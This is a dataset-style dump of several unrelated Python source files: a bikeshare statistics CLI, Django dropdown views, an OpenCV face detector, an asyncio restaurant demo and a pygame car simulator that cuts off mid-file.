are:\\n\",df['Start Station'].count())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display Birth year of client\n start_time=time.time()\n print(\"\\n\\nNow working on analysis of distribution of Birth Year of clients!\")\n if 'Birth Year' not in df:\n print(\"\\n\\nNo data available!\")\n elif False in df['Birth Year'].isnull():\n print(\"\\n\\nNumber of NaN value is:\\n\", df['Birth Year'].isnull().sum())\n print(\"\\n\\nExcluding NaN data!\")\n print(\"\\n\\nThe distribution of Birth Year of clients:\\n\",df['Birth Year'].dropna(axis=0).describe()[['mean','std','25%','50%','75%']].round(0))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n else:\n print(\"\\n\\nNo NaN data!\")\n print(\"\\n\\nThe distribution of Birth Year of clients:\\n\",df['Birth Year'].describe()[['mean','std','25%','50%','75%']].round(0))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n #counter the gender of clients\n start_time=time.time()\n print(\"\\n\\nNow working on analysis of gender of clients!\")\n if 'Gender' not in df:\n print(\"\\n\\nNo data available!\")\n elif False in df['Gender'].isnull():\n print(\"\\n\\nNumber of NaN value is:\\n\", df['Gender'].isnull().sum())\n print(\"\\n\\nExcluding NaN data!\")\n print(\"\\n\\nThe counts of gender of clients:\\n\",df['Gender'].dropna(axis=0).value_counts())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n else:\n print(\"\\n\\nNo NaN data!\")\n print(\"\\n\\nThe counts of gender of clients:\\n\",df['Gender'].value_counts())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n elif question == (\"no\"):\n\n\n while True:\n question1=input(\"Do you want to calculate the distribution of trip duration? yes or no\\n\").lower()\n if question1==(\"yes\"):\n start_time=time.time()\n print(\"The distribution of trip duration(second):\\n\",df['Trip Duration'].describe()[['mean','std','25%','50%','75%']].round(1))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question1==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question2=input(\"\\nDo you want to view the most commonly used start station? yes or no\\n\").lower()\n if question2==(\"yes\"):\n start_time=time.time()\n print('Most commonly used start station:\\n', df['Start Station'].value_counts().idxmax())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question2==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question3=input(\"\\nDo you want to view the most commonly used end station? yes or no\\n\").lower()\n if question3==(\"yes\"):\n start_time=time.time()\n print('Most commonly used End station:\\n', df['End Station'].value_counts().idxmax())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question3==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question4=input(\"\\nDo you want to view the most commonly used route? yes or no\\n\").lower()\n Start_Stop_stations = df['Start Station'] + \"*\" + df['End Station']\n common_station = Start_Stop_stations.value_counts().idxmax()\n if question4==(\"yes\"):\n start_time=time.time()\n print('Most frequent used route is:\\n{} \\nto\\n{}'.format(common_station.split('*')[0], common_station.split('*')[1]))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question4==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question5=input(\"\\nDo you want to view total travelling events? yes or no\\n\").lower()\n if question5==(\"yes\"):\n start_time=time.time()\n print(\"The total trip events are:\\n\",df['Start Station'].count())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question5==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question6=input(\"\\nDo you want to know the Birth Year disbribution of clients\\n\").lower()\n if question6==(\"yes\"):\n start_time=time.time()\n print(\"\\n\\nNow working on analysis of distribution of Birth Year of clients!\")\n if 'Birth Year' not in df:\n print(\"\\n\\nNo data available!\")\n break\n elif False in df['Birth Year'].isnull():\n print(\"\\n\\nNumber of NaN value is:\\n\", df['Birth Year'].isnull().sum())\n print(\"\\n\\nExcluding NaN data!\")\n print(\"\\n\\nThe distribution of Birth Year of clients:\\n\",df['Birth Year'].dropna(axis=0).describe()[['mean','std','25%','50%','75%']].round(0))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif False not in df['Birth Year'].isnull():\n print(\"\\n\\nNo NaN data!\")\n print(\"\\n\\nThe distribution of Birth Year of clients:\\n\",df['Birth Year'].describe()[['mean','std','25%','50%','75%']].round(0))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question6==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question7=input(\"\\nDo you want to know the gender counts of clients\\n\").lower()\n if question7==(\"yes\"):\n start_time=time.time()\n print(\"\\n\\nnNow working on analysis of gender of clients!\")\n if 'Gender' not in df:\n print(\"\\n\\nNo data available!\")\n break\n elif False in df['Gender'].isnull():\n print(\"\\n\\nNumber of NaN value is:\\n\", df['Gender'].isnull().sum())\n print(\"\\n\\nExcluding NaN data!\")\n print(\"\\n\\nThe counts of gender of clients:\\n\",df['Gender'].dropna(axis=0).value_counts())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif False not in df['Gender'].isnull():\n print(\"\\n\\nNo NaN data!\")\n print(\"\\n\\The counts of gender of clients:\\n\",df['Gender'].value_counts())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n else:\n print(\"The input is invalid!\")\n\n\n\n\n\ndef display_data(df):\n n=0\n while True:\n questions6=input(\"\\nDO you want to view raw data?(20 line each time)\\n\").lower()\n if questions6==('yes'):\n print(\"Raw data are:\\n\\n\", df.iloc[n:n+20])\n n=n+20\n elif questions6==('no'):\n break\n else:\n print (\"The input is invalid!\")\n return display_data(df)\ndef restart():\n while True:\n restart = input(\"Do you want to restart?\\n\").lower()\n if restart== (\"yes\"):\n main()\n elif restart == (\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n\ndef main():\n city,month,day=filter_data()\n df=data_load(city, month, day)\n stat(df)\n display_data(df)\n restart()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":12261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"503002776","text":"\n\nfrom xai.brain.wordbase.nouns._disappearance import _DISAPPEARANCE\n\n#calss header\nclass _DISAPPEARANCES(_DISAPPEARANCE, ):\n\tdef __init__(self,): \n\t\t_DISAPPEARANCE.__init__(self)\n\t\tself.name = \"DISAPPEARANCES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"disappearance\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_disappearances.py","file_name":"_disappearances.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"132774329","text":"'''\n@author: haiwen\n@date: 2021/3/3\n@file: test_contract.py\n'''\nimport allure\nimport pytest\n\nfrom pylibs.plugins.convert_data import current_time, get_param, dynamic_report\n\n\n# @allure.title('{name}')\n@dynamic_report('name')\n@pytest.mark.parametrize(['name','amount'],get_param('casedata/api_testdata.yml'))\ndef test_tc003001(empty_contracts,init_account,init_contract_type,init_org,name,amount):\n ctapi=empty_contracts\n othercompany=init_account['_id'] #签约对象\n contract_type=init_contract_type['_id'] #合同分类\n company_id=init_org['_id'] #部门\n #参数字典\n kwargs={\n 'name' : name,\n 'amount':amount,\n 'othercompany' : othercompany,\n 'contract_type' : contract_type,\n 'company_id' : company_id,\n 'create_date' : current_time()\n }\n #创建合同\n contract= ctapi.add(**kwargs)\n\n #检查合同是否创建\n contract_list = ctapi.list_all()\n assert contract in contract_list\n\n\n","sub_path":"projectChapter/d/testcase/webapi/D-管理员登录/D-销售部门/D-签约对象马总/D-合同分类-采购合同/test_contract.py","file_name":"test_contract.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"45565273","text":"# coding=utf-8\r\n\r\nfrom utils.views import AbsDefaultView\r\nfrom django.shortcuts import render_to_response\r\nfrom django.http import HttpResponseRedirect\r\nfrom module.common import get_top_left_modules, get_modules_core\r\n\r\nfrom django.http import HttpResponse\r\nfrom utils import render_to_response_json\r\nfrom dict.models import *\r\nfrom dict.forms import *\r\nfrom soft_enter.models import dict_School_tp \r\nimport xlrd\r\n\r\ndef ajax_adm_region(request):\r\n province_code = request.GET.get('province_code', None)\r\n city_code = request.GET.get('city_code', None)\r\n if province_code:\r\n html = \"\"\r\n if not city_code:\r\n adms = AdministrativeRegion.objects.filter(province_code = province_code).distinct().values(\"city_code\", \"city_name\")\r\n for adm in adms:\r\n html += \"\" % (adm[\"city_code\"], adm[\"city_name\"])\r\n elif city_code:\r\n adms = AdministrativeRegion.objects.filter(province_code = province_code, city_code = city_code).values(\"id\", \"county_name\")\r\n for adm in adms:\r\n html += \"\" % (adm[\"id\"], adm[\"county_name\"])\r\n else:\r\n return HttpResponse(\"false\")\r\n return HttpResponse(html)\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_master_direction(request):\r\n '''研究生学院、专业、研究方向三级级联'''\r\n master_college = request.GET.get('college', None)\r\n master_major = request.GET.get('major', None)\r\n if master_college:\r\n html = \"\"\r\n if not master_major:\r\n mcs = MasterCatalogue.objects.filter(yxsdm = master_college).distinct().values(\"zydm\", \"zymc\",\"zydm\")\r\n for mc in mcs:\r\n html += \"\" % (mc[\"zydm\"], mc[\"zymc\"],mc[\"zydm\"])\r\n elif master_major:\r\n mcs = MasterCatalogue.objects.filter(yxsdm = master_college, zydm = master_major).values(\"id\", \"yjfxmc\")\r\n for mc in mcs:\r\n html += \"\" % (mc[\"id\"], mc[\"yjfxmc\"])\r\n else:\r\n return HttpResponse(\"false\")\r\n return HttpResponse(html)\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_master_direction_2013(request):\r\n '''研究生学院、专业、研究方向三级级联'''\r\n master_college = request.GET.get('college', None)\r\n master_major = request.GET.get('major', None)\r\n if master_college:\r\n html = \"\"\r\n if not master_major:\r\n mcs = MasterCatalogue_2013.objects.filter(yxsdm = master_college).distinct().values(\"zydm\", \"zymc\",\"zydm\")\r\n for mc in mcs:\r\n html += \"\" % (mc[\"zydm\"], mc[\"zymc\"],mc[\"zydm\"])\r\n elif master_major:\r\n mcs = MasterCatalogue_2013.objects.filter(yxsdm = master_college, zydm = master_major).values(\"id\", \"yjfxmc\")\r\n for mc in mcs:\r\n html += \"\" % (mc[\"id\"], mc[\"yjfxmc\"])\r\n else:\r\n return HttpResponse(\"false\")\r\n return HttpResponse(html)\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_school(request):\r\n '''省市与学校级联'''\r\n ssdm = request.GET.get('ssdm', None)\r\n if ssdm:\r\n html = \"\"\r\n schls = School_UG.objects.filter(district_code = ssdm).values(\"id\", \"school_name\")\r\n for schl in schls:\r\n html += \"\" % (schl[\"id\"], schl[\"school_name\"])\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n \r\ndef ajax_master_major(request):\r\n '''学院与专业二级级联'''\r\n yxsdm = request.GET.get('yxsdm', None)\r\n if yxsdm:\r\n html = \"\"\r\n mmjs = Major_Catalogue.objects.filter(yxsdm = yxsdm).values(\"id\",\"zymc\")\r\n for mmj in mmjs:\r\n html += \"\" % (mmj[\"id\"], mmj[\"zymc\"])\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_major(request):\r\n c = request.GET.get('c', None)\r\n if c:\r\n html = \"\"\r\n mjs = UndergraduateMajor.objects.filter(code__startswith=c).extra(where=('length(code)=' + str(len(c) + 2),))\r\n for mj in mjs:\r\n html += \"\" % (mj.id, mj.name)\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n \r\ndef ajax_adm_city(request):\r\n c = request.GET.get('c', None)\r\n if c:\r\n html = \"\"\r\n citys = GB_District_City.objects.filter(code__startswith=c).extra(where=('length(code)=' + str(len(c) + 4),))\r\n for city in citys:\r\n html += \"\" % (city.pk, city.name)\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_adm_district(request):#软件学院招生暂用\r\n c = request.GET.get('c', None)\r\n if c:\r\n html = \"\"\r\n citys = GB_District.objects.filter(code__startswith=c).extra(where=('length(code)=' + str(len(c) + 4),))\r\n for city in citys:\r\n html += \"\" % (city.pk, city.name)\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_adm_native_district(request):\r\n c = request.GET.get('c', None)\r\n if c:\r\n html = \"\"\r\n citys = GB_NativeDistrict.objects.filter(code__startswith=c).extra(where=('length(code)=' + str(len(c) + 4),))\r\n for city in citys:\r\n html += \"\" % (city.pk, city.name)\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n\r\n##################################################\r\n# #\r\n# 字典表数据维护 #\r\n# #\r\n##################################################\r\n\r\n###软件工程/进修生 本科毕业院校 数据维护###\r\n##################################################\r\nclass DataSchoolView(AbsDefaultView):\r\n DefaultModel = School_UG\r\n DefaultForm = School_UGForm\r\n template_dir = \"dict/School_UG/\"\r\n \r\n list_args = {\"u\":\"school_code__contains\",\r\n \"sname\":\"school_name__contains\",\r\n \"district_name\":\"district_name\",\r\n }\r\n \r\n urlmap = {r\"^$|list/$\": ['list', 'list'],\r\n r\"(?P\\d+)/$\": ['view', 'view'],\r\n r\"(?P\\d+)/update/$\": ['update', 'update'],\r\n r\"(?P\\d+)/delete/$\": ['delete', ''],\r\n r\"add/$\": ['add', 'update'],\r\n \r\n r\"daoru/$\": ['daoru', ''],\r\n }\r\n\r\n def _get_list(self, request):\r\n return self.DefaultModel.objects.all().order_by('school_code') \r\n \r\n def _get_list_dicts(self, request):\r\n dicts = get_modules_core(request,'/supervise/admin/')\r\n school_ug = self.DefaultModel.objects.filter()\r\n lists = []\r\n for i in school_ug:\r\n name = i.district_name\r\n lists.append(name)\r\n school_name = set(lists)\r\n district_name = list(school_name)\r\n dicts.update({'district_name_dic':district_name,})\r\n return dicts\r\n \r\n def _get_update_dicts(self, request):\r\n dicts = get_modules_core(request,'/supervise/admin/')\r\n return dicts\r\n \r\n def _get_view_dict(self, request, o):\r\n dicts = get_modules_core(request,'/supervise/admin/')\r\n return dicts\r\n \r\n ###首次导入数据用,可删###\r\n def daoru(self, request, template):\r\n xls_name = \"home/gsmis/work/gsadmission/templates/dict/School_UG/test.xls\"\r\n \r\n bk = xlrd.open_workbook(xls_name)\r\n sheet = bk.sheet_by_index(0)\r\n rows = sheet.nrows\r\n \r\n for row in range(rows):\r\n if row == 0:\r\n continue\r\n sch = self.DefaultModel()\r\n \r\n sch.school_code = str(sheet.cell_value(row, 0))[0:5]\r\n sch.school_name = sheet.cell_value(row, 1)\r\n sch.district_code = str(sheet.cell_value(row, 2))[0:2]\r\n sch.district_name = sheet.cell_value(row, 3)\r\n sch.save()\r\n \r\n return HttpResponseRedirect('/supervise/dict/')\r\n##################################################\r\n","sub_path":"dict/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"135798511","text":"import asyncio\nfrom datetime import datetime\n\nasync def get_soda(client):\n print(\" > Remplissage du soda pour {}\".format(client))\n await asyncio.sleep(1)\n print(\" < Le soda de {} est prêt\".format(client))\n\nasync def get_fries(client):\n print(\" > Démarrage de la cuisson des frites pour {}\".format(client))\n await asyncio.sleep(4)\n print(\" < Les frites de {} sont prêtes\".format(client))\n\nasync def get_burger(client):\n print(\" > Commande du burger en cuisine pour {}\".format(client))\n await asyncio.sleep(3)\n print(\" < Le burger de {} est prêt\".format(client))\n\nasync def serve(client):\n print(\"=> Commande passée par {}\".format(client))\n start_time = datetime.now()\n await asyncio.wait(\n [\n get_soda(client),\n get_fries(client),\n get_burger(client)\n ]\n )\n total = datetime.now() - start_time\n print(\"<= {} servi en {}\".format(client, datetime.now() - start_time))\n return total\n\nSODA_LOCK = asyncio.Lock()\n\nasync def get_soda(client):\n # Acquisition du verrou\n # la syntaxe 'async with FOO' peut être lue comme 'with (yield from FOO)'\n async with SODA_LOCK:\n # Une seule tâche à la fois peut exécuter ce bloc\n print(\" > Remplissage du soda pour {}\".format(client))\n await asyncio.sleep(1)\n print(\" < Le soda de {} est prêt\".format(client))\n\nBURGER_SEM = asyncio.Semaphore(3)\n\nasync def get_burger(client):\n print(\" > Commande du burger en cuisine pour {}\".format(client))\n async with BURGER_SEM:\n await asyncio.sleep(3)\n print(\" < Le burger de {} est prêt\".format(client))\n\nFRIES_COUNTER = 0\nFRIES_LOCK = asyncio.Lock()\n\nasync def get_fries(client):\n global FRIES_COUNTER\n async with FRIES_LOCK:\n print(\" > Récupération des frites pour {}\".format(client))\n if FRIES_COUNTER == 0:\n print(\" ** Démarrage de la cuisson des frites\")\n await asyncio.sleep(4)\n FRIES_COUNTER = 5\n print(\" ** Les frites sont cuites\")\n FRIES_COUNTER -= 1\n print(\" < Les frites de {} sont prêtes\".format(client))\n\nasync def perf_test(nb_requests, period, timeout):\n tasks = []\n # On lance 'nb_requests' commandes à 'period' secondes d'intervalle\n for idx in range(1, nb_requests + 1):\n client_name = \"client_{}\".format(idx)\n tsk = asyncio.ensure_future(serve(client_name))\n tasks.append(tsk)\n await asyncio.sleep(period)\n\n finished, _ = await asyncio.wait(tasks)\n success = set()\n for tsk in finished:\n if tsk.result().seconds < timeout:\n success.add(tsk)\n\n print(\"{}/{} clients satisfaits\".format(len(success), len(finished)))\n\n\nloop = asyncio.get_event_loop()\n#loop.run_until_complete(asyncio.wait([serve(clt) for clt in 'ABCD']))\nloop.run_until_complete(perf_test(5, 0.5, 5))\n","sub_path":"AsyncPython.py","file_name":"AsyncPython.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"509396572","text":"#!/usr/bin/env python3\n\n\"\"\"\n.. module:: testLheReader\n :synopsis: Tests the lheReader\n Depends also on lheDecomposer.\n\n.. moduleauthor:: Wolfgang Waltenberger \n\n\"\"\"\n\nimport sys\nsys.path.insert(0,\"../\")\nimport unittest\n\nclass LheReaderTest(unittest.TestCase):\n def testReader(self):\n \"\"\" test the LheReader \"\"\"\n from smodels.theory import lheReader, lheDecomposer, crossSection\n from smodels.tools.physicsUnits import GeV\n\n filename = \"./testFiles/lhe/simplyGluino.lhe\"\n reader = lheReader.LheReader(filename)\n event = reader.next()\n element = lheDecomposer.elementFromEvent(event,\n crossSection.XSectionList())\n s=str(element)\n assert ( s == \"[[[q,q]],[[q,q]]]\" )\n b0=element.branches[0]\n sb0=str(b0)\n assert ( sb0 == \"[[q,q]]\" )\n assert ( b0.masses[0]-675*GeV ) < .1*GeV\n assert ( b0.masses[1]-600*GeV ) < .1*GeV\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/testLheReader.py","file_name":"testLheReader.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"258200910","text":"#Written by Kyle, help provided by Sean Devenport\nimport numpy as np\nimport cv2\n\ndef main():\n\tface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\teye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\n\tvidcap = cv2.VideoCapture(0)\n\n\twhile True:\n\t\tflg, img=vidcap.read()\n\t\tgray=cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tif flg:\n\t\t\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\t\t\tfor (x,y,w,h) in faces:\n\t\t\t img = cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)\n\t\t\t roi_gray = gray[y:y+h, x:x+w]\n\t\t\t roi_color = img[y:y+h, x:x+w]\n\t\t\t eyes = eye_cascade.detectMultiScale(roi_gray)\n\t\t\t for (ex,ey,ew,eh) in eyes:\n\t\t\t cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(255,0,0),2)\n\n\t\t\tcv2.imshow('img',img)\n\t\t\tif cv2.waitKey(2) & 0xFF == 27:\n\t\t\t\tbreak\n\t\telse:\n\t\t\tbreak\n\tvidcap.release()\n\tcv2.destroyAllWindows()\n\nmain()\n","sub_path":"facial recognition/ViolaJones.py","file_name":"ViolaJones.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"476278582","text":"NOMBRE = \"loren.txt\"\ntry:\n archivo = open(NOMBRE,'r')\n i = 1\n for linea in archivo:\n i = i + 1\n cantidad_lineas = i\n archivo.close()\n\n archivo = open(NOMBRE,'r')\n\n contenido = archivo.read ()\n contenido2=contenido\n palabras = contenido.split()\n cantidad_palabras = len (palabras)\n \n archivo.close()\n\n archivo = open(NOMBRE,'r')\n\n w = 0\n for caracter in contenido2:\n w = w + 1\n cantidad_caracteres = w\n archivo.close()\n\n print (cantidad_lineas, cantidad_palabras, cantidad_caracteres)\nexcept FileNotFoundError:\n print (\"El archivo no existe\")\n\n\n","sub_path":"wc.py","file_name":"wc.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"393877842","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport pygame\r\nimport numpy as np\r\nimport math\r\nfrom math import sin, radians, degrees, copysign\r\n\r\nclass Car:\r\n #생성자 함수\r\n def __init__(self, x, y, yaw=0.0, max_steering=30, max_acceleration=1000.0):\r\n self.x = x\r\n self.y = y\r\n self.Arr_x = []\r\n self.Arr_y = []\r\n self.Arr_xl = []#수정\r\n self.Arr_yl = []#수정\r\n #자동차 충돌 감지\r\n self.isCrach = False\r\n\r\n #yaw 값\r\n self.yaw = yaw\r\n #최대 가속도 값\r\n self.max_acceleration = max_acceleration\r\n #최대 조향각 값\r\n self.max_steering = max_steering\r\n #브레이크로 인한 감속 가속도값 (스페이스바를 누르는 경우 사용됨)\r\n self.brake_deceleration = 300\r\n #정지마찰력으로 인한 감속 가속도값 (키 눌림이 없는 경우 (엑셀에서 발을 뗀 경우) 적용됨)\r\n self.free_deceleration = 50\r\n\r\n #선형 가속도\r\n self.linear_acceleration = 10.0\r\n #선속도\r\n self.linear_velocity = 0.0\r\n #최대 속도\r\n self.max_velocity = 1000\r\n #조향각\r\n self.steering_angle = 0.0\r\n #자동차 휠베이스 (축거 : 앞바퀴축과 뒷바퀴축 사이의 거리) \r\n self.wheel_base = 84\r\n\r\n #자동차 이미지 좌표 (가로x세로 128x64 픽셀의 자동차 그림파일. car.png)\r\n self.car_img_x = 0\r\n self.car_img_y = 0\r\n self.car_x_ori = [-64,-64, 64, 64] # 왼쪽 위아래, 오른쪽 위아래 포인트 총4개\r\n self.car_y_ori = [-32, 32,-32, 32] # 왼쪽 위아래, 오른쪽 위아래 포인트 총4개\r\n\r\n #정지한 자동차 이미지 좌표_plus\r\n self.car_img_x_stop = 1030\r\n self.car_img_y_stop = 170\r\n \r\n def update(self, dt):\r\n #선속도를 계산한다. (선속도=선형가속도x단위시간)\r\n self.linear_velocity += (self.linear_acceleration * dt)\r\n #선속도를 (-100,100) 사이로 값을 제한한다.\r\n self.linear_velocity = min(max(-self.max_velocity, self.linear_velocity), self.max_velocity)\r\n\r\n self.angular_velocity = 0.0\r\n \r\n #조향각이 0이 아니라면\r\n if self.steering_angle != 0.0:\r\n #각속도를 계산한다. 각속도=(선속도/회전반지름) \r\n self.angular_velocity = (float(self.linear_velocity) / float(self.wheel_base)) * np.tan(np.radians(self.steering_angle))\r\n \r\n #각변위를 계산해 angle 값에 더해준다. (각속도x시간=각변위)\r\n self.yaw += (np.degrees(self.angular_velocity) * dt)\r\n #이동변위를 계산해 spatium(이동거리) 값에 적용한다. (선속도x시간=이동변위)\r\n self.spatium = self.linear_velocity * dt\r\n #삼각비를 이용해 x,y 좌표를 구해준다.\r\n self.x += (self.spatium * np.cos(np.radians(-self.yaw)))\r\n self.y += (self.spatium * np.sin(np.radians(-self.yaw)))\r\n \r\n car_x = [0,0,0,0]\r\n car_y = [0,0,0,0]\r\n for i in range(4):\r\n car_x[i] = self.car_x_ori[i] * np.cos(-radians(self.yaw)) - self.car_y_ori[i] * np.sin(-radians(self.yaw)) + self.x\r\n car_y[i] = self.car_x_ori[i] * np.sin(-radians(self.yaw)) + self.car_y_ori[i] * np.cos(-radians(self.yaw)) + self.y \r\n self.car_img_x = int(round(min(car_x)))\r\n self.car_img_y = int(round(min(car_y)))\r\n print('x, y' , self.x, self.y)\r\n print('x', self.car_img_x)\r\n print('y', self.car_img_y)\r\n\r\n #실행 시간 계산하기_plus\r\n py_time = round((pygame.time.get_ticks()/1000)%1, 1)\r\n\r\n #큐에 자동차 위치 append_plus\r\n self.Arr_xl.append(car_x)#수정\r\n self.Arr_yl.append(car_y)#수정\r\n if py_time==0.2 or py_time==0.4 or py_time==0.6:#수정\r\n self.Arr_x.append(car_x)\r\n self.Arr_y.append(car_y)\r\n\r\n#pygame을 초기화 하는 함수\r\npygame.init()\r\n\r\n#windows title을 정하는 함수\r\npygame.display.set_caption(\"Pygame Car Simulator #1\")\r\n\r\n#pygame window size 설정\r\nwidth, height = 1280, 720 \r\n\r\n#설정된 windows size를 적용하는 함수\r\nscreen = pygame.display.set_mode((width, height))\r\n\r\n#while 루프 반복주기. 화면갱신 FPS를 설정하기 위한 시간객체 생성\r\nclock = pygame.time.Clock()\r\n\r\n#Car 객체 생성\r\ncurrent_dir = os.path.dirname(os.path.abspath(__file__))\r\nimage_path = os.path.join(current_dir, \"car.png\")\r\ncar_image = pygame.image.load(image_path)\r\ncar = Car(100,100)\r\n#Car 객체 생성\r\ncar_image_stop = pygame.image.load(image_path)\r\ncar_stop = Car(1030, 170)\r\n\r\n#아래 while 루프를 종료시키기 위해 선언하는 변수\r\nexit_flags = False\r\n\r\nwhile not exit_flags:\r\n\r\n #while 루프 반복주기. 화면갱신 FPS를 설정.\r\n clock.tick(60)\r\n\r\n #단위시간의 크기 설정 - 단위시간이란 1 frame이 지나가는데 걸리는 시간이다.\r\n #해당 시간이 있어야 속력=거리/시간 등의 공식을 계산할 수 있다.\r\n dt = float(clock.get_time()) / float(1000)\r\n \r\n #이벤트 감지. 여기선 종료이벤트만 확인하여 루프 종료변수를 True로 변경\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n exit_flags = True\r\n \r\n #입력된 키보드값을 가져와서 pressed 변수에 입력\r\n pressed = pygame.key.get_pressed()\r\n\r\n #키보드의 위쪽 방향키가 눌러졌을 경우\r\n if pressed[pygame.K_UP]:\r\n #선속도가 음수라면 (현재 후진중이라면)\r\n if car.linear_velocity < 0:\r\n #브레이크 감속가속도가 적용된다.\r\n car.linear_acceleration = car.brake_deceleration\r\n #선속도가 양수라면 (현재 전진중이라면)\r\n else:\r\n #선가속도를 (+)방향으로 증가시킨다.(점점 빠르게 전진하도록)\r\n car.linear_acceleration += 10 * dt\r\n \r\n #키보드의 아래쪽 방향키가 눌러졌을 경우\r\n elif pressed[pygame.K_DOWN]:\r\n #선속도가 양수라면 (현재 전진중이라면)\r\n if car.linear_velocity > 0:\r\n #브레이크 감속가속도가 적용된다.\r\n car.linear_acceleration = -car.brake_deceleration\r\n #선속도가 음수라면 (현재 후진중이라면)\r\n else: \r\n #선가속도를 (-)방향으로 증가시킨다. (점점 빠르게 후진하도록) \r\n car.linear_acceleration -= 10 * dt\r\n \r\n #키보드의 스페이스키가 눌러졌을 경우\r\n elif pressed[pygame.K_SPACE]:\r\n #선속도가 (브레이크 감속가속도 x 단위시간)보다 크다면\r\n if abs(car.linear_velocity) > dt * car.brake_deceleration:\r\n #copysign(double x, double y); y의 부호를 x의 부호로 사용\r\n #브레이크 감속가속도만큼 빼서 선가속도를 줄인다. 빠르게 멈춘다.\r\n car.linear_acceleration = -copysign(car.brake_deceleration, car.linear_velocity)\r\n #선속도가 (브레이크 감속가속도 x 단위시간)보다 작다면\r\n else:\r\n #선속도/단위시간=선가속도 만큼 뺀다. 즉, 가속도값이 0이 되어 멈춘다.\r\n car.linear_acceleration = -float(car.linear_velocity) / float(dt)\r\n \r\n #그 외의 키보드키가 눌러졌을 경우 \r\n else:\r\n #선속도가 (정지마찰력 감속가속도 x 단위시간)보다 크다면\r\n if abs(car.linear_velocity) > dt * car.free_deceleration:\r\n #copysign(double x, double y); y의 부호를 x의 부호로 사용\r\n #정지마찰력이 적용돼 서서히 멈춘다.\r\n car.linear_acceleration = -copysign(car.free_deceleration, car.linear_velocity)\r\n #선속도가 (정지마찰력 감속가속도 x 단위시간)보다 작다면\r\n else:\r\n #단위시간이 0이 아니라면\r\n if dt != 0:\r\n #선속도/단위시간=선가속도 만큼 뺀다. 즉, 가속도값이 0이 되어 멈춘다.\r\n car.linear_acceleration = -float(car.linear_velocity) / float(dt)\r\n \r\n #선가속도의 범위를 (-1000.0~1000.0)사이의 값으로 제한한다. \r\n car.linear_acceleration = max(-car.max_acceleration, min(car.linear_acceleration, car.max_acceleration))\r\n\r\n #키보드의 오른쪽 방향키가 눌러졌을 경우 \r\n if pressed[pygame.K_RIGHT]:\r\n #우회전한다. 30x단위시간으로 계산된 각도만큼 뺀다.\r\n car.steering_angle -= 30 * dt\r\n \r\n #키보드의 왼쪽 방향키가 눌러졌을 경우 \r\n elif pressed[pygame.K_LEFT]:\r\n #좌회전한다. 30x단위시간으로 계산된 각도만큼 더한다.\r\n car.steering_angle += 30 * dt\r\n \r\n #조향관련 키가 